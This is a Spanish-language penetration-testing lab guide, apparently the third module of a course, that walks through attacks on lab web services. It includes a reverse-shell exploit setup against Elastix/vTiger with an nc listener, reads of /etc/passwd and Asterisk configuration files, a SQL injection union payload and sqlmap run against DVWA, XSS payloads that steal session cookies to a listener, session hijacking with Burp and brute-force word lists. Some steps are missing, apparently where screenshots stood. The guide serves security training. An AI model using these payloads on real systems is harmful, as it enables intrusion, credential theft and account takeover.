Documentos de Académico
Documentos de Profesional
Documentos de Cultura
Modulo 3
A.- Vulnerabilidades en Servicios WEB – Ataques externos.
Descripción: En este laboratorio se usaran los diferentes herramientas del proceso de evaluación
de seguridad de servicios WEB
Objetivo: Realizar explotación de vulnerabilidades a servicios WEB para determinar debilidad ante
ataques externos.
# ifconfig eth0
# nc -lvp 443
# vi exploit.py
rhost="10.51.1.43" -------> IP EXPLOTADA
lhost="10.51.1.40" ------> IP LOCAL
lport=443
extension="101"
# ifconfig
# uname -a
# cat /etc/asterisk/sip_additional.conf
1.2.- PHP Code Injection Exploit en VTIGER 5.2.1 - Elastix 2.3
A) Configurar el exploit
# php elastix.php
Enter Target [https://ip] # https://192.168.10.142
C) Exploit completados
Si el exploit es exitoso, proporcionará una shell reversa que permita la ejecución de comandos
# id
# ifconfig
# cat /etc/passwd
# cat /etc/manager.conf
2.- Búsqueda automatizada de vulnerabilidades Web con ZAP PROXY
Editar/Preferencias/Avanzado/Red/Configuración
Configuración manual de proxy
Proxy http : 127.0.0.1
Puerto : 8080
Una vez autenticado, regresar a ZAP Proxy y la URL a evaluar estará capturada.
Activar el spider
Activar el escaneo activo
'
- Invocar al schema (base schema,nombre bd) para determinar las bases de datos y tablas
en este caso determinar las tablas de la base de datos de la app
' union all select column_name,1 from information_schema.columns where table_schema = 'dvwa' and
table_name = 'users'; -- //
Luego ingresar nuevamente a DVWA , bajar el nivel de seguridad , ingresar a SQLI , e ingresar el
valor 1 e ir al botón submit
Finalmente ZAP Proxy , habrá capturado toda la transacción y copiaremos la cookie de sesión
como se muestra a continuación
Iniciando el ataque con SQLMAP
Verificando la vulnerabilidad
sqlmap --url="http://192.168.10.148/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --
cookie="security=low; PHPSESSID=6ga2n64ladeu484mhq5smua2t1"
<script>alert("HACKED")</script>
<script>alert(document.cookie)</script>
Name : pepe
Message : Esta buena la pagina
Otro
Name : Yo mismo
Message : <script>alert("HACKED")</script>
Objetivo : Capturar la cookie de sesión para in personar a un usuario, de una aplicación web vía
vulnerabilidad XSS.
1.- En el Equipo que captura el cookie
#yum -y install nc
#nc -lv 80
OJO : Donde la dirección IP es la que pertenece a la maquina con el puerto de escucha (Maquina
virtual Pivot)
Como se muestra no es posible insertar toda la cadena XSS, para es necesario activar la
inspección de elementos y luego modificar el limite del elemento TXTAREA de la siguiente forma.
PHPSESSID=u9h5a2bm4birt348mo511ou7d7;%20acopendivids=swingset,jotto,phpbb2,redmine;
%20acgroupswithpersist=nada
- Usar la cookie de sesión capturada, para iniciar sesión sin credenciales validas en la aplicación,
usando Burp suite de la siguiente forma :
Editar/Preferencias/Avanzado/Red/Configuración
Configuración manual de proxy
Proxy http : 127.0.0.1
Puerto : 8080
Luego hacer clic en la pestaña “Params” y modificar la variable PHPSESSID con el valor capturado
de la siguiente forma :
Finalmente hacer clic en el boton “Forward” y veremos que habremos ingresado sin contraseña.
6.- Explotación de ataques de fuerza bruta formularios.
bee
user
admin
administrator
bug
admin
administrator
password
AHora ir a la pestana "Options" y en la seccion "Grep - Match" eliminar todas las opciones con el
boton "Clealr" y agregar